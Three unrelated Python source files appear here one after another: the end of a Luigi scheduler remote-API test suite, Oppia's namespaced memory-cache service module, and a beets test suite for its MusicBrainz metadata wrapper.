'PENDING') self.assertEqual(remote._upstream_status(A().task_id, {}), 'UPSTREAM_MISSING_INPUT') pc = missing_input.get(C().task_id) self.assertEqual(pc['status'], 'PENDING') self.assertEqual(remote._upstream_status(C().task_id, {}), 'UPSTREAM_MISSING_INPUT') upstream_failed = remote.task_list('PENDING', 'UPSTREAM_FAILED') self.assertEqual(len(upstream_failed), 2) pe = upstream_failed.get(E().task_id) self.assertEqual(pe['status'], 'PENDING') self.assertEqual(remote._upstream_status(E().task_id, {}), 'UPSTREAM_FAILED') pe = upstream_failed.get(D().task_id) self.assertEqual(pe['status'], 'PENDING') self.assertEqual(remote._upstream_status(D().task_id, {}), 'UPSTREAM_FAILED') pending = dict(missing_input) pending.update(upstream_failed) self.assertEqual(remote.task_list('PENDING', ''), pending) self.assertEqual(remote.task_list('PENDING', 'UPSTREAM_RUNNING'), {}) failed = remote.task_list('FAILED', '') self.assertEqual(len(failed), 1) fd = failed.get(F().task_id) self.assertEqual(fd['status'], 'FAILED') all = dict(pending) all.update(done) all.update(failed) self.assertEqual(remote.task_list('', ''), all) self.assertEqual(remote.task_list('RUNNING', ''), {}) def test_task_search(self): self._build([FactorTask(8)]) self._build([FailingTask(8)]) remote = self._remote() all_tasks = remote.task_search('Task') self.assertEqual(len(all_tasks), 2) self._assert_all(all_tasks['DONE'], 'DONE') self._assert_all(all_tasks['FAILED'], 'FAILED') def test_fetch_error(self): self._build([FailingTask(8)]) remote = self._remote() error = remote.fetch_error(FailingTask(task_id=8).task_id) self.assertEqual(error["taskId"], FailingTask(task_id=8).task_id) self.assertTrue("Error Message" in error["error"]) self.assertTrue("Runtime error" in error["error"]) self.assertTrue("Traceback" in error["error"]) def test_inverse_deps(self): class X(luigi.Task): pass class Y(luigi.Task): def requires(self): return [X()] class Z(luigi.Task): id = luigi.Parameter() def requires(self): return [Y()] class ZZ(luigi.Task): def requires(self): return [Z(1), Z(2)] self._build([ZZ()]) dep_graph = self._remote().inverse_dep_graph(X().task_id) def assert_has_deps(task_id, deps): self.assertTrue(task_id in dep_graph, '%s not in dep_graph %s' % (task_id, dep_graph)) task = dep_graph[task_id] self.assertEqual(sorted(task['deps']), sorted(deps), '%s does not have deps %s' % (task_id, deps)) assert_has_deps(X().task_id, [Y().task_id]) assert_has_deps(Y().task_id, [Z(id=1).task_id, Z(id=2).task_id]) assert_has_deps(Z(id=1).task_id, [ZZ().task_id]) assert_has_deps(Z(id=2).task_id, [ZZ().task_id]) assert_has_deps(ZZ().task_id, []) def test_simple_worker_list(self): class X(luigi.Task): def run(self): self._complete = True def complete(self): return getattr(self, '_complete', False) task_x = X() self._build([task_x]) workers = self._remote().worker_list() self.assertEqual(1, len(workers)) worker = workers[0] self.assertEqual(task_x.task_id, worker['first_task']) self.assertEqual(0, worker['num_pending']) self.assertEqual(0, worker['num_uniques']) self.assertEqual(0, worker['num_running']) self.assertEqual('active', worker['state']) self.assertEqual(1, worker['workers']) def test_worker_list_pending_uniques(self): class X(luigi.Task): def complete(self): return False class Y(X): def requires(self): return X() class Z(Y): pass w1 = luigi.worker.Worker(scheduler=self.scheduler, worker_processes=1) w2 = luigi.worker.Worker(scheduler=self.scheduler, worker_processes=1) w1.add(Y()) w2.add(Z()) workers = self._remote().worker_list() self.assertEqual(2, len(workers)) for worker in workers: self.assertEqual(2, worker['num_pending']) self.assertEqual(1, worker['num_uniques']) self.assertEqual(0, worker['num_running']) def test_worker_list_running(self): class X(luigi.Task): n = luigi.IntParameter() w = luigi.worker.Worker(worker_id='w', scheduler=self.scheduler, worker_processes=3) w.add(X(0)) w.add(X(1)) w.add(X(2)) w.add(X(3)) self.scheduler.get_work(worker='w') self.scheduler.get_work(worker='w') self.scheduler.get_work(worker='w') workers = self._remote().worker_list() self.assertEqual(1, len(workers)) worker = workers[0] self.assertEqual(3, worker['num_running']) self.assertEqual(1, worker['num_pending']) self.assertEqual(1, worker['num_uniques']) def test_worker_list_disabled_worker(self): class X(luigi.Task): pass with luigi.worker.Worker(worker_id='w', scheduler=self.scheduler) as w: w.add(X()) # workers = self._remote().worker_list() self.assertEqual(1, len(workers)) self.assertEqual('active', workers[0]['state']) self.scheduler.disable_worker('w') workers = self._remote().worker_list() self.assertEqual(1, len(workers)) self.assertEqual(1, len(workers)) self.assertEqual('disabled', workers[0]['state'])
# coding: utf-8 # # Copyright 2020 The Oppia Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Service functions to set and retrieve data from the memory cache.""" from __future__ import annotations import json from core.domain import caching_domain from core.domain import collection_domain from core.domain import exp_domain from core.domain import platform_parameter_domain from core.domain import skill_domain from core.domain import story_domain from core.domain import topic_domain from core.platform import models from typing import Any, Callable, Dict, List, cast, overload from typing_extensions import Final, Literal, TypedDict MYPY = False if MYPY: # pragma: no cover from mypy_imports import memory_cache_services memory_cache_services = models.Registry.import_cache_services() # NOTE: Namespaces and sub-namespaces cannot contain ':' because this is used as # an internal delimiter for cache keys that separates the namespace, the # sub-namespace, and the id in the cache keys. MEMCACHE_KEY_DELIMITER = ':' # This namespace supports sub-namespaces which are identified by the stringified # version number of the explorations within the sub-namespace. The value for # each key in this namespace should be a serialized representation of an # Exploration. There is also a special sub-namespace represented by the empty # string; this sub-namespace stores the latest version of the exploration. CACHE_NAMESPACE_EXPLORATION: Final = 'exploration' # This namespace supports sub-namespaces which are identified by the stringified # version number of the collections within the sub-namespace. The value for # each key in this namespace should be a serialized representation of a # Collection. There is also a special sub-namespace represented by the empty # string; this sub-namespace stores the latest version of the collection. CACHE_NAMESPACE_COLLECTION: Final = 'collection' # This namespace supports sub-namespaces which are identified by the stringified # version number of the skills within the sub-namespace. The value for # each key in this namespace should be a serialized representation of a # Skill. There is also a special sub-namespace represented by the empty # string; this sub-namespace stores the latest version of the skill. CACHE_NAMESPACE_SKILL: Final = 'skill' # This namespace supports sub-namespaces which are identified by the stringified # version number of the stories within the sub-namespace. The value for # each key in this namespace should be a serialized representation of a # Story. There is also a special sub-namespace represented by the empty # string; this sub-namespace stores the latest version of the story. CACHE_NAMESPACE_STORY: Final = 'story' # This namespace supports sub-namespaces which are identified by the stringified # version number of the topics within the sub-namespace. The value for # each key in this namespace should be a serialized representation of a # Topic. There is also a special sub-namespace represented by the empty # string; this sub-namespace stores the latest version of the topic. CACHE_NAMESPACE_TOPIC: Final = 'topic' # This namespace supports sub-namespaces which are identified by the stringified # version number of the topics within the sub-namespace. The value for # each key in this namespace should be a serialized representation of a # Platform Parameter. This namespace does not support sub-namespaces. CACHE_NAMESPACE_PLATFORM_PARAMETER: Final = 'platform' # The value for each key in this namespace should be a serialized representation # of a ConfigPropertyModel value (the 'value' attribute of a ConfigPropertyModel # object). This namespace does not support sub-namespaces. CACHE_NAMESPACE_CONFIG: Final = 'config' # The sub-namespace is not necessary for the default namespace. The namespace # handles default datatypes allowed by Redis including Strings, Lists, Sets, # and Hashes. More details can be found at: https://redis.io/topics/data-types. CACHE_NAMESPACE_DEFAULT: Final = 'default' class DeserializationFunctionsDict(TypedDict): """Type for the DESERIALIZATION_FUNCTIONS.""" collection: Callable[[str], collection_domain.Collection] exploration: Callable[[str], exp_domain.Exploration] skill: Callable[[str], skill_domain.Skill] story: Callable[[str], story_domain.Story] topic: Callable[[str], topic_domain.Topic] platform: Callable[[str], platform_parameter_domain.PlatformParameter] config: Callable[[str], dict[str, Any]] default: Callable[[str], dict[str, Any]] class SerializationFunctionsDict(TypedDict): """Type for the SERIALIZATION_FUNCTIONS.""" collection: Callable[[collection_domain.Collection], str] exploration: Callable[[exp_domain.Exploration], str] skill: Callable[[skill_domain.Skill], str] story: Callable[[story_domain.Story], str] topic: Callable[[topic_domain.Topic], str] platform: Callable[[platform_parameter_domain.PlatformParameter], str] config: Callable[[dict[str, Any]], str] default: Callable[[dict[str, Any]], str] # Type defined for arguments which can accept only keys of Dict # DESERIALIZATION_FUNCTIONS or SERIALIZATION_FUNCTIONS. NamespaceType = Literal[ 'collection', 'exploration', 'skill', 'story', 'topic', 'platform', 'config', 'default' ] DESERIALIZATION_FUNCTIONS: DeserializationFunctionsDict = { CACHE_NAMESPACE_COLLECTION: collection_domain.Collection.deserialize, CACHE_NAMESPACE_EXPLORATION: exp_domain.Exploration.deserialize, CACHE_NAMESPACE_SKILL: skill_domain.Skill.deserialize, CACHE_NAMESPACE_STORY: story_domain.Story.deserialize, CACHE_NAMESPACE_TOPIC: topic_domain.Topic.deserialize, CACHE_NAMESPACE_PLATFORM_PARAMETER: ( platform_parameter_domain.PlatformParameter.deserialize), CACHE_NAMESPACE_CONFIG: json.loads, CACHE_NAMESPACE_DEFAULT: json.loads } # Since we mapped this Dict with `SerializationFunctionsDict`. So, here # every 'x' in value belongs to some object, like CACHE_NAMESPACE_COLLECTION's # x is a collection object. When we call serialize method on it, Mypy expects # it to be a typed call. So, to remove un-typed-call error ignore statement # is placed temporarily. Untill all classes are typed. SERIALIZATION_FUNCTIONS: SerializationFunctionsDict = { CACHE_NAMESPACE_COLLECTION: lambda x: cast(str, x.serialize()), # type: ignore[no-untyped-call] CACHE_NAMESPACE_EXPLORATION: lambda x: cast(str, x.serialize()), # type: ignore[no-untyped-call] CACHE_NAMESPACE_SKILL: lambda x: cast(str, x.serialize()), # type: ignore[no-untyped-call] CACHE_NAMESPACE_STORY: lambda x: cast(str, x.serialize()), # type: ignore[no-untyped-call] CACHE_NAMESPACE_TOPIC: lambda x: x.serialize(), CACHE_NAMESPACE_PLATFORM_PARAMETER: lambda x: cast(str, x.serialize()), # type: ignore[no-untyped-call] CACHE_NAMESPACE_CONFIG: json.dumps, CACHE_NAMESPACE_DEFAULT: json.dumps } def _get_memcache_key( namespace: NamespaceType, sub_namespace: str | None, obj_id: str ) -> str: """Returns a memcache key for the class under the corresponding namespace and sub_namespace. Args: namespace: str. The namespace under which the values associated with the id lie. Use CACHE_NAMESPACE_DEFAULT as the namespace for ids that are not associated with a conceptual domain-layer entity and therefore don't require serialization. sub_namespace: str|None. The sub-namespace further differentiates the values. For Explorations, Skills, Stories, Topics, and Collections, the sub-namespace is the stringified version number of the objects. obj_id: str. The id of the value to store in the memory cache. Raises: ValueError. The sub-namespace contains a ':'. Returns: str. The generated key for use in the memory cache in order to differentiate a passed-in key based on namespace and sub-namespace. """ sub_namespace_key_string = (sub_namespace or '') if MEMCACHE_KEY_DELIMITER in sub_namespace_key_string: raise ValueError( 'Sub-namespace %s cannot contain \':\'.' % sub_namespace_key_string) return '%s%s%s%s%s' % ( namespace, MEMCACHE_KEY_DELIMITER, sub_namespace_key_string, MEMCACHE_KEY_DELIMITER, obj_id) def flush_memory_caches() -> None: """Flushes the memory caches by wiping all of the data.""" memory_cache_services.flush_caches() @overload def get_multi( namespace: Literal['collection'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, collection_domain.Collection]: ... @overload def get_multi( namespace: Literal['exploration'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, exp_domain.Exploration]: ... @overload def get_multi( namespace: Literal['skill'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, skill_domain.Skill]: ... @overload def get_multi( namespace: Literal['story'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, story_domain.Story]: ... @overload def get_multi( namespace: Literal['topic'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, topic_domain.Topic]: ... @overload def get_multi( namespace: Literal['platform'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, platform_parameter_domain.PlatformParameter]: ... @overload def get_multi( namespace: Literal['config'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, Dict[str, Any]]: ... @overload def get_multi( namespace: Literal['default'], sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, Dict[str, Any]]: ... def get_multi( namespace: NamespaceType, sub_namespace: str | None, obj_ids: List[str] ) -> Dict[str, Any]: """Get a dictionary of the {id, value} pairs from the memory cache. Args: namespace: str. The namespace under which the values associated with these object ids lie. The namespace determines how the objects are decoded from their JSON-encoded string. Use CACHE_NAMESPACE_DEFAULT as the namespace for objects that are not associated with a conceptual domain-layer entity and therefore don't require serialization. sub_namespace: str|None. The sub-namespace further differentiates the values. For Explorations, Skills, Stories, Topics, and Collections, the sub-namespace is either None or the stringified version number of the objects. If the sub-namespace is not required, pass in None. obj_ids: list(str). List of object ids corresponding to values to retrieve from the cache. Raises: ValueError. The namespace does not exist or is not recognized. Returns: dict(str, Exploration|Skill|Story|Topic|Collection|str). Dictionary of decoded (id, value) pairs retrieved from the platform caching service. """ # In result_dict's key-value pair, value can be any of the type from # Exploration, Skill, Story, Topic, Collection, str. hence Any type has # to be used here for the value type of result_dict dictionary. result_dict: Dict[str, Any] = {} if len(obj_ids) == 0: return result_dict if namespace not in DESERIALIZATION_FUNCTIONS: raise ValueError('Invalid namespace: %s.' % namespace) memcache_keys = [ _get_memcache_key(namespace, sub_namespace, obj_id) for obj_id in obj_ids] values = memory_cache_services.get_multi(memcache_keys) for obj_id, value in zip(obj_ids, values): if value: result_dict[obj_id] = DESERIALIZATION_FUNCTIONS[namespace](value) return result_dict @overload def set_multi( namespace: Literal['exploration'], sub_namespace: str | None, id_value_mapping: Dict[str, exp_domain.Exploration] ) -> bool: ... @overload def set_multi( namespace: Literal['collection'], sub_namespace: str | None, id_value_mapping: Dict[str, collection_domain.Collection] ) -> bool: ... @overload def set_multi( namespace: Literal['skill'], sub_namespace: str | None, id_value_mapping: Dict[str, skill_domain.Skill] ) -> bool: ... @overload def set_multi( namespace: Literal['story'], sub_namespace: str | None, id_value_mapping: Dict[str, story_domain.Story] ) -> bool: ... @overload def set_multi( namespace: Literal['topic'], sub_namespace: str | None, id_value_mapping: Dict[str, topic_domain.Topic] ) -> bool: ... @overload def set_multi( namespace: Literal['platform'], sub_namespace: str | None, id_value_mapping: Dict[ str, platform_parameter_domain.PlatformParameter ] ) -> bool: ... @overload def set_multi( namespace: Literal['config'], sub_namespace: str | None, id_value_mapping: Dict[str, str] ) -> bool: ... @overload def set_multi( namespace: Literal['default'], sub_namespace: str | None, id_value_mapping: Dict[str, str] ) -> bool: ... def set_multi( namespace: NamespaceType, sub_namespace: str | None, id_value_mapping: Dict[str, Any] ) -> bool: """Set multiple id values at once to the cache, where the values are all of a specific namespace type or a Redis compatible type (more details here: https://redis.io/topics/data-types). Args: namespace: str. The namespace under which the values associated with the id lie. Use CACHE_NAMESPACE_DEFAULT as the namespace for objects that are not associated with a conceptual domain-layer entity and therefore don't require serialization. sub_namespace: str|None. The sub-namespace further differentiates the values. For Explorations, Skills, Stories, Topics, and Collections, the sub-namespace is either None or the stringified version number of the objects. If the sub-namespace is not required, pass in None. id_value_mapping: dict(str, Exploration|Skill|Story|Topic|Collection|str). A dict of {id, value} pairs to set to the cache. Raises: ValueError. The namespace does not exist or is not recognized. Returns: bool. Whether all operations complete successfully. """ if len(id_value_mapping) == 0: return True memory_cache_id_value_mapping = { _get_memcache_key(namespace, sub_namespace, obj_id): SERIALIZATION_FUNCTIONS[namespace](value) for obj_id, value in id_value_mapping.items() } return memory_cache_services.set_multi(memory_cache_id_value_mapping) def delete_multi( namespace: NamespaceType, sub_namespace: str | None, obj_ids: List[str] ) -> bool: """Deletes multiple ids in the cache. Args: namespace: str. The namespace under which the values associated with the id lie. Use CACHE_NAMESPACE_DEFAULT namespace for object ids that are not associated with a conceptual domain-layer entity and therefore don't require serialization. sub_namespace: str|None. The sub-namespace further differentiates the values. For Explorations, Skills, Stories, Topics, and Collections, the sub-namespace is either None or the stringified version number of the objects. If the sub-namespace is not required, pass in None. obj_ids: list(str). A list of id strings to delete from the cache. Raises: ValueError. The namespace does not exist or is not recognized. Returns: bool. Whether all operations complete successfully. """ if len(obj_ids) == 0: return True memcache_keys = [ _get_memcache_key(namespace, sub_namespace, obj_id) for obj_id in obj_ids] return memory_cache_services.delete_multi(memcache_keys) == len(obj_ids) def get_memory_cache_stats() -> caching_domain.MemoryCacheStats: """Get a memory profile of the cache in a dictionary dependent on how the caching service profiles its own cache. Returns: MemoryCacheStats. MemoryCacheStats object containing the total allocated memory in bytes, peak memory usage in bytes, and the total number of keys stored as values. """ return memory_cache_services.get_memory_cache_stats()
# This file is part of beets. # Copyright 2015, Adrian Sampson. # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. """Tests for MusicBrainz API wrapper. """ from __future__ import (division, absolute_import, print_function, unicode_literals) from test import _common from test._common import unittest from beets.autotag import mb from beets import config import mock class MBAlbumInfoTest(_common.TestCase): def _make_release(self, date_str='2009', tracks=None, track_length=None, track_artist=False): release = { 'title': 'ALBUM TITLE', 'id': 'ALBUM ID', 'asin': 'ALBUM ASIN', 'disambiguation': 'R_DISAMBIGUATION', 'release-group': { 'type': 'Album', 'first-release-date': date_str, 'id': 'RELEASE GROUP ID', 'disambiguation': 'RG_DISAMBIGUATION', }, 'artist-credit': [ { 'artist': { 'name': 'ARTIST NAME', 'id': 'ARTIST ID', 'sort-name': 'ARTIST SORT NAME', }, 'name': 'ARTIST CREDIT', } ], 'date': '3001', 'medium-list': [], 'label-info-list': [{ 'catalog-number': 'CATALOG NUMBER', 'label': {'name': 'LABEL NAME'}, }], 'text-representation': { 'script': 'SCRIPT', 'language': 'LANGUAGE', }, 'country': 'COUNTRY', 'status': 'STATUS', } if tracks: track_list = [] for i, recording in enumerate(tracks): track = { 'recording': recording, 'position': bytes(i + 1), } if track_length: # Track lengths are distinct from recording lengths. track['length'] = track_length if track_artist: # Similarly, track artists can differ from recording # artists. track['artist-credit'] = [ { 'artist': { 'name': 'TRACK ARTIST NAME', 'id': 'TRACK ARTIST ID', 'sort-name': 'TRACK ARTIST SORT NAME', }, 'name': 'TRACK ARTIST CREDIT', } ] track_list.append(track) release['medium-list'].append({ 'position': '1', 'track-list': track_list, 'format': 'FORMAT', 'title': 'MEDIUM TITLE', }) return release def _make_track(self, title, tr_id, duration, artist=False): track = { 'title': title, 'id': tr_id, } if duration is not None: track['length'] = duration if artist: track['artist-credit'] = [ { 'artist': { 'name': 'RECORDING ARTIST NAME', 'id': 'RECORDING ARTIST ID', 'sort-name': 'RECORDING ARTIST SORT NAME', }, 'name': 'RECORDING ARTIST CREDIT', } ] return track def test_parse_release_with_year(self): release = self._make_release('1984') d = mb.album_info(release) self.assertEqual(d.album, 'ALBUM TITLE') self.assertEqual(d.album_id, 'ALBUM ID') self.assertEqual(d.artist, 'ARTIST NAME') self.assertEqual(d.artist_id, 'ARTIST ID') self.assertEqual(d.original_year, 1984) self.assertEqual(d.year, 3001) self.assertEqual(d.artist_credit, 'ARTIST CREDIT') def test_parse_release_type(self): release = self._make_release('1984') d = mb.album_info(release) self.assertEqual(d.albumtype, 'album') def test_parse_release_full_date(self): release = self._make_release('1987-03-31') d = mb.album_info(release) self.assertEqual(d.original_year, 1987) self.assertEqual(d.original_month, 3) self.assertEqual(d.original_day, 31) def test_parse_tracks(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=tracks) d = mb.album_info(release) t = d.tracks self.assertEqual(len(t), 2) self.assertEqual(t[0].title, 'TITLE ONE') self.assertEqual(t[0].track_id, 'ID ONE') self.assertEqual(t[0].length, 100.0) self.assertEqual(t[1].title, 'TITLE TWO') self.assertEqual(t[1].track_id, 'ID TWO') self.assertEqual(t[1].length, 200.0) def test_parse_track_indices(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=tracks) d = mb.album_info(release) t = d.tracks self.assertEqual(t[0].medium_index, 1) self.assertEqual(t[0].index, 1) self.assertEqual(t[1].medium_index, 2) self.assertEqual(t[1].index, 2) def test_parse_medium_numbers_single_medium(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=tracks) d = mb.album_info(release) self.assertEqual(d.mediums, 1) t = d.tracks self.assertEqual(t[0].medium, 1) self.assertEqual(t[1].medium, 1) def test_parse_medium_numbers_two_mediums(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=[tracks[0]]) second_track_list = [{ 'recording': tracks[1], 'position': '1', }] release['medium-list'].append({ 'position': '2', 'track-list': second_track_list, }) d = mb.album_info(release) self.assertEqual(d.mediums, 2) t = d.tracks self.assertEqual(t[0].medium, 1) self.assertEqual(t[0].medium_index, 1) self.assertEqual(t[0].index, 1) self.assertEqual(t[1].medium, 2) self.assertEqual(t[1].medium_index, 1) self.assertEqual(t[1].index, 2) def test_parse_release_year_month_only(self): release = self._make_release('1987-03') d = mb.album_info(release) self.assertEqual(d.original_year, 1987) self.assertEqual(d.original_month, 3) def test_no_durations(self): tracks = [self._make_track('TITLE', 'ID', None)] release = self._make_release(tracks=tracks) d = mb.album_info(release) self.assertEqual(d.tracks[0].length, None) def test_track_length_overrides_recording_length(self): tracks = [self._make_track('TITLE', 'ID', 1.0 * 1000.0)] release = self._make_release(tracks=tracks, track_length=2.0 * 1000.0) d = mb.album_info(release) self.assertEqual(d.tracks[0].length, 2.0) def test_no_release_date(self): release = self._make_release(None) d = mb.album_info(release) self.assertFalse(d.original_year) self.assertFalse(d.original_month) self.assertFalse(d.original_day) def test_various_artists_defaults_false(self): release = self._make_release(None) d = mb.album_info(release) self.assertFalse(d.va) def test_detect_various_artists(self): release = self._make_release(None) release['artist-credit'][0]['artist']['id'] = \ mb.VARIOUS_ARTISTS_ID d = mb.album_info(release) self.assertTrue(d.va) def test_parse_artist_sort_name(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.artist_sort, 'ARTIST SORT NAME') def test_parse_releasegroupid(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.releasegroup_id, 'RELEASE GROUP ID') def test_parse_asin(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.asin, 'ALBUM ASIN') def test_parse_catalognum(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.catalognum, 'CATALOG NUMBER') def test_parse_textrepr(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.script, 'SCRIPT') self.assertEqual(d.language, 'LANGUAGE') def test_parse_country(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.country, 'COUNTRY') def test_parse_status(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.albumstatus, 'STATUS') def test_parse_media(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(None, tracks=tracks) d = mb.album_info(release) self.assertEqual(d.media, 'FORMAT') def test_parse_disambig(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.albumdisambig, 'RG_DISAMBIGUATION, R_DISAMBIGUATION') def test_parse_disctitle(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(None, tracks=tracks) d = mb.album_info(release) t = d.tracks self.assertEqual(t[0].disctitle, 'MEDIUM TITLE') self.assertEqual(t[1].disctitle, 'MEDIUM TITLE') def test_missing_language(self): release = self._make_release(None) del release['text-representation']['language'] d = mb.album_info(release) self.assertEqual(d.language, None) def test_parse_recording_artist(self): tracks = [self._make_track('a', 'b', 1, True)] release = self._make_release(None, tracks=tracks) track = mb.album_info(release).tracks[0] self.assertEqual(track.artist, 'RECORDING ARTIST NAME') self.assertEqual(track.artist_id, 'RECORDING ARTIST ID') self.assertEqual(track.artist_sort, 'RECORDING ARTIST SORT NAME') self.assertEqual(track.artist_credit, 'RECORDING ARTIST CREDIT') def test_track_artist_overrides_recording_artist(self): tracks = [self._make_track('a', 'b', 1, True)] release = self._make_release(None, tracks=tracks, track_artist=True) track = mb.album_info(release).tracks[0] self.assertEqual(track.artist, 'TRACK ARTIST NAME') self.assertEqual(track.artist_id, 'TRACK ARTIST ID') self.assertEqual(track.artist_sort, 'TRACK ARTIST SORT NAME') self.assertEqual(track.artist_credit, 'TRACK ARTIST CREDIT') def test_data_source(self): release = self._make_release() d = mb.album_info(release) self.assertEqual(d.data_source, 'MusicBrainz') class ParseIDTest(_common.TestCase): def test_parse_id_correct(self): id_string = "28e32c71-1450-463e-92bf-e0a46446fc11" out = mb._parse_id(id_string) self.assertEqual(out, id_string) def test_parse_id_non_id_returns_none(self): id_string = "blah blah" out = mb._parse_id(id_string) self.assertEqual(out, None) def test_parse_id_url_finds_id(self): id_string = "28e32c71-1450-463e-92bf-e0a46446fc11" id_url = "http://musicbrainz.org/entity/%s" % id_string out = mb._parse_id(id_url) self.assertEqual(out, id_string) class ArtistFlatteningTest(_common.TestCase): def _credit_dict(self, suffix=''): return { 'artist': { 'name': 'NAME' + suffix, 'sort-name': 'SORT' + suffix, }, 'name': 'CREDIT' + suffix, } def _add_alias(self, credit_dict, suffix='', locale='', primary=False): alias = { 'alias': 'ALIAS' + suffix, 'locale': locale, 'sort-name': 'ALIASSORT' + suffix } if primary: alias['primary'] = 'primary' if 'alias-list' not in credit_dict['artist']: credit_dict['artist']['alias-list'] = [] credit_dict['artist']['alias-list'].append(alias) def test_single_artist(self): a, s, c = mb._flatten_artist_credit([self._credit_dict()]) self.assertEqual(a, 'NAME') self.assertEqual(s, 'SORT') self.assertEqual(c, 'CREDIT') def test_two_artists(self): a, s, c = mb._flatten_artist_credit( [self._credit_dict('a'), ' AND ', self._credit_dict('b')] ) self.assertEqual(a, 'NAMEa AND NAMEb') self.assertEqual(s, 'SORTa AND SORTb') self.assertEqual(c, 'CREDITa AND CREDITb') def test_alias(self): credit_dict = self._credit_dict() self._add_alias(credit_dict, suffix='en', locale='en', primary=True) self._add_alias(credit_dict, suffix='en_GB', locale='en_GB', primary=True) self._add_alias(credit_dict, suffix='fr', locale='fr') self._add_alias(credit_dict, suffix='fr_P', locale='fr', primary=True) self._add_alias(credit_dict, suffix='pt_BR', locale='pt_BR') # test no alias config['import']['languages'] = [''] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('NAME', 'SORT', 'CREDIT')) # test en primary config['import']['languages'] = ['en'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASen', 'ALIASSORTen', 'CREDIT')) # test en_GB en primary config['import']['languages'] = ['en_GB', 'en'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASen_GB', 'ALIASSORTen_GB', 'CREDIT')) # test en en_GB primary config['import']['languages'] = ['en', 'en_GB'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASen', 'ALIASSORTen', 'CREDIT')) # test fr primary config['import']['languages'] = ['fr'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASfr_P', 'ALIASSORTfr_P', 'CREDIT')) # test for not matching non-primary config['import']['languages'] = ['pt_BR', 'fr'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASfr_P', 'ALIASSORTfr_P', 'CREDIT')) class MBLibraryTest(unittest.TestCase): def test_match_track(self): with mock.patch('musicbrainzngs.search_recordings') as p: p.return_value = { 'recording-list': [{ 'title': 'foo', 'id': 'bar', 'length': 42, }], } ti = list(mb.match_track('hello', 'there'))[0] p.assert_called_with(artist='hello', recording='there', limit=5) self.assertEqual(ti.title, 'foo') self.assertEqual(ti.track_id, 'bar') def test_match_album(self): mbid = 'd2a6f856-b553-40a0-ac54-a321e8e2da99' with mock.patch('musicbrainzngs.search_releases') as sp: sp.return_value = { 'release-list': [{ 'id': mbid, }], } with mock.patch('musicbrainzngs.get_release_by_id') as gp: gp.return_value = { 'release': { 'title': 'hi', 'id': mbid, 'medium-list': [{ 'track-list': [{ 'recording': { 'title': 'foo', 'id': 'bar', 'length': 42, }, 'position': 9, }], 'position': 5, }], 'artist-credit': [{ 'artist': { 'name': 'some-artist', 'id': 'some-id', }, }], 'release-group': { 'id': 'another-id', } } } ai = list(mb.match_album('hello', 'there'))[0] sp.assert_called_with(artist='hello', release='there', limit=5) gp.assert_called_with(mbid, mock.ANY) self.assertEqual(ai.tracks[0].title, 'foo') self.assertEqual(ai.album, 'hi') def test_match_track_empty(self): with mock.patch('musicbrainzngs.search_recordings') as p: til = list(mb.match_track(' ', ' ')) self.assertFalse(p.called) self.assertEqual(til, []) def test_match_album_empty(self): with mock.patch('musicbrainzngs.search_releases') as p: ail = list(mb.match_album(' ', ' ')) self.assertFalse(p.called) self.assertEqual(ail, []) def suite(): return unittest.TestLoader().loadTestsFromName(__name__) if __name__ == b'__main__': unittest.main(defaultTest='suite')
